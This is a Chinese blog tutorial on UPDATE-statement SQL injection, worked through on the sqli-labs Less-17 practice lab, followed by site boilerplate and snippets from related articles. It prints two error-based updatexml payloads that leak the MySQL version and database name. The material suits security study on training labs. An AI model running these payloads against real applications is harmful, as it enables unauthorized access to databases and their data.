SQL注入实战:Update注入

已于 2024-07-10 14:09:00 修改
阅读量872 收藏 11
点赞数 9
分类专栏: 网络安全攻防基础 文章标签: sql 数据库
于 2024-01-21 20:01:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ting_liang/article/details/135732544
版权

一:Update注入原理

有的程序员在写源代码的时候,只是对查询的sql语句的用户输入内容进行了过滤,忽略了update

类型sql语句的用户输入的内容的过滤

二、mysql的Update语句复习

update语句可用来修改表中的数据,简单来说基本的使用形式为:

update表名称set列名称=新值where更新条件;

UPDATE table_name SET field1=new-value1,field2=new-value2[WHERE Clause]

1、sqli-labs less-17关

payload

name=admin&passwd=admin' or updatexml(1,concat(0x7e,version(),0x7e),1)#&submit=Submit

如下图所示,爆出版本信息

uname=admin&passwd=000000' and updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit

如下图所示,爆出数据库名称

ting~liang
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
25-4 SQL注入攻击 - update注入
weixin_43263566的博客
03-09 751
使用mysql函数:代码中使用了过时的mysql函数来执行SQL查询,而不是使用更安全的mysqli或PDO。mysql函数对于SQL注入攻击是脆弱的,因为它没有提供预处理语句的功能。黑名单过滤只能防止已知的攻击字符串,而无法应对所有可能的变种和绕过方法。替换为适合您情况的实际条件,以确保只有符合条件的行会被更新。获取用户输入的ID值,但没有对其进行充分的验证和过滤,直接将其用于SQL查询。自定义的黑名单过滤机制:代码中使用了自定义的黑名单函数。用户输入未经过充分验证和过滤:在代码中,通过。
update语句_WEB安全之SQL注入(13)——update注入
weixin_39848953的博客
12-09 2589
01前言大家好,我是阿里斯,一名IT行业小白。上一篇文章分享了insert注入,算是一个铺垫,今天我们一起来看看update注入update注入是非常危险一种注入。可能因为payload构造不合理会直接导致整张表都被修改。02update注入update正常语句update users set sex='man' where id=$id;update注入是非常危险的,不管你开发还是安...
8.SQL注入-基于insert,update利用案例
最新发布
愿听风成曲
07-03 834
sql语句正常插入表中的数据例如插入小强数据,如图所示:采用or这个运算符,构造闭合语句‘xiaoqinag’ or __ or 中后面的那个or后的单引号是为了闭合掉语句后面本身带有的单引号。而前面第一个or后是我们要填的注入语句。这里还是用后台报错的方法来构造payload,且有必要提到的是,这里我们还用的了updatexmal()基于insert语句下的报错:暴库payload语句。
在进行SQL注入时遇到UPDATE语句时注意事项
banliyaoguai的博客
05-21 337
例如,将一个字符串值与一个 DOUBLE 类型的列进行比较或运算,或者将一个非数字字符串转换为 DOUBLE 类型时。但是有一种情况,就是里面注入sql语句如果时系统函数的话,他是可以显示出系统函数的结果的,原因就是系统函数的优先级比较高,Mysql在发现系统函数的话就会执行系统函数。若使用下列代码,会出现不报错也不显示的结果。在update进行判断时他会将下面的语句用括号括起来然后再进行判断,下列语句在遇到1的时候就判断正确。在注入注入语句应该如下图,要使用1和报错函数连接。
SQL注入Update注入
weixin_43765321的博客
03-03 5644
1. MySQL中的update函数 如果我们需要修改或更新MysQL中的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行中的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行中的若干列 UPDATE table SET c
sql注入
qq_49714982的博客
04-06 1657
高版本:在MYSQL5.0以上版本存在一个自带数据库为information_schema,它是一个存储所有数据库名、表名、列名的数据库,相当于可以通过查询它获取指定数据库下面的表名、列名信息。id=1 and 1=2 union select 1,database(),user(),4)union select 1,2,3,4(几个列就写到几,并且让?id=1报错,比如id=-1或者 and 1=2)id=-1 union select 1,group_concat(数据项1),3,4 from。
SQL注入内容更新.
一个世界一个家,我爱中国!
04-24 879
DECLARE @T VARCHAR(255),@C VARCHAR(255) --声明两个变量DECLARE Table_Cursor CURSOR FOR  --声明游标Select a.name,b.name FROM sysobjects a,syscolumns b --系统对象表与字段表Where a.id=b.id AND a.xtype=u AND (b.xtype=99 or
SQL注入——update注入(pikachu)
W小哥
01-15 3244
第一步:访问目标站点,注册一个账号xiaosan:123456,并登录 第二步:点击修改个人信息,并用burpsuite工具拦截数据包,修改住址为123456 拦截数据包,右键发送到Repeater 第三步:测试注入点 正常请求页面 输入单引号测试注入点页面 第四步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,co...
不一样的sql注入
2202_75361164的博客
05-18 647
不一样的sql注入,看了肯定有所收获!
insert/update注入
Ethan024的博客
03-30 992
insert/update注入 实验环境: 皮卡丘靶场—insert/update注入 原理: insert注入(注册新用户): 后端没有做防SQL注入处理,在前端注册的信息,通过insert直接拼接到数据库中; insert into member(username, pw, sex, phonenum, email, address) value (‘xiaohong’, 1111, 1, 2, 3, 4) insert语句一般通过or进行闭合: insert into member(userna
SQL注入UPDATE、insert、delete注入
07-08 3325
SQL注入
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
sql注入#sql靶场
11-02
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能正确过滤或验证用户输入的数据,导致恶意SQL代码可以被嵌入到查询中并被执行。SQL靶场通常是指用于安全培训、测试和研究SQL注入攻击的环境,它可以帮助开发者...
Sql注入攻击技术实战
08-10
SQL注入攻击是一种常见的网络安全威胁,主要针对基于Web的应用程序。当程序员在开发应用程序时,如果没有对用户输入的数据进行充分的验证和过滤,攻击者就可以利用这个漏洞,将恶意的SQL语句插入到正常的查询中,...
SQL练习实战学习项目
02-18
实战项目中,"sql-inject-demo-master" 这个文件名暗示了我们将涉及到SQL注入的概念。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码,来获取未经授权的数据或者控制数据库服务器。...
SQL注入PPT内容讲解的很详细
04-19
PPT可能包含实际的攻击示例和防御措施的展示,帮助理解SQL注入实战场景。 6. **应急响应与恢复**: - 发现注入攻击后,立即停止受影响的服务,修复漏洞。 - 追踪数据泄露情况,通知受影响的用户。 - 对数据库...
(手工)【sqli-labs17】update注入:原理、利用过程
07-10 663
SQL-update注入
mysql 注入 update_关于update的一个小注入
weixin_32698563的博客
02-01 998
昨天在小密圈看到ph师傅发了一段code,当时想的是利用join方法去进行报错注入,结果晚上一看,乐师傅已经解决了QAQ(膜,自己也写一下关于这段code的分析:code区域:$link = mysqli_connect('localhost', 'root', 'root');mysqli_select_db($link, 'code');$table = addslashes($_GET['t...
Pikachu SQL注入之insert/update注入
SS_liang的博客
01-11 1811
updateXML函数是一种在XML文档中修改或更新指定节点的方法。它在许多编程语言和XML处理库中都有实现。updateXML函数通常接受三个参数:XML文档、XPath表达式和要更新的值。XML文档是要进行修改的原始XML数据。XPath表达式用于定位要更新的节点。它可以是简单的节点路径,也可以使用更复杂的条件和过滤器来选择节点。要更新的值是要设置给节点的新值。当调用updateXML函数时,它会根据XPath表达式找到匹配的节点,然后将其值设置为指定的新值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ting~liang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值